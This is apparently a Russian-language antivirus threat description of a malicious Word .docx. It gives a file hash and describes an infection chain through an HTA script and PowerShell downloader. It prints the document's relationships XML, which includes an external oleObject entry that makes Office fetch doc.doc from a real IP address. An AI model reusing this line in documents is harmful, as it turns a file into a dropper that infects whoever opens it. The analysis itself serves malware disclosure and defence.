SHA1:
- c85e3179793072b72f885aba702653cec128b16b
Уязвимость для Microsoft Office, реализованная в виде документа Microsoft Word с расширением .docx. Содержит следующие строки:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://***.org/package/2006/relationships"><Relationship Id="rId3" Type="http:// ***.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId7" Type="http:// ***.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId2" Type="http://***/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://***/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://***/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://***/officeDocument/2006/relationships/oleObject" Target="http://144.217.14.173/doc.doc" TargetMode="External"/><Relationship Id="rId4" Type="http://***/officeDocument/2006/relationships/image" Target="media/image1.emf"/></Relationships>
При попытке открытия этого документа происходит загрузка другого файла с именем doc.doc, который содержит встроенный HTA-сценарий, детектируемый Dr.Web под именем PowerShell.DownLoader.72.
При выполнении PowerShell.DownLoader.72 вызывает интерпретатор PowerShell. В нем обрабатывается другой вредоносный скрипт, скачивающий на атакуемый компьютер исполняемый файл.
